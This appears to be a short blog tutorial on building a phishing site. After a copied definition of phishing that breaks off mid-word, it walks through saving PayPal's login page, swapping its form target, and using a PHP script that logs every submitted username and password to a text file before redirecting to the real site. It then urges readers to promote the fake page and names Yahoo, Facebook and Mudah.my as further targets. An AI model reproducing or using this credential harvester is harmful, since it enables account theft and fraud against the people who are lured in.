Fake Site (Phishing)

0
Phishing is a way of attempting to acquire information such as usernames,passwords, and credit card details by masquerading as a trustworthy entity in anelectronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mailspoofing or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing,[4] probably influenced by phreaking,[5] [6] and alludes to "baits" u

How to make Fake Site?
In this tutorial, we will use PayPal site to make a fake site :)

1. Open the PayPal site using Google Chrome or Mozilla FireFox.
2. Stay at Login Page & Save the Login Page (CTRL+P)
3. Copy this code & Save as login.php

<?php
header ('Location: http://paypal.com/ ');
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

4. Open Saved PayPal Site with Notepad. (The HTML).

5.Find this line & change it to your login.php Location
6. Upload your Fake site & Start Promote it :)



Example of Fake Site

Yahoo.com




Facebook.com


Mudah.my


Download Link :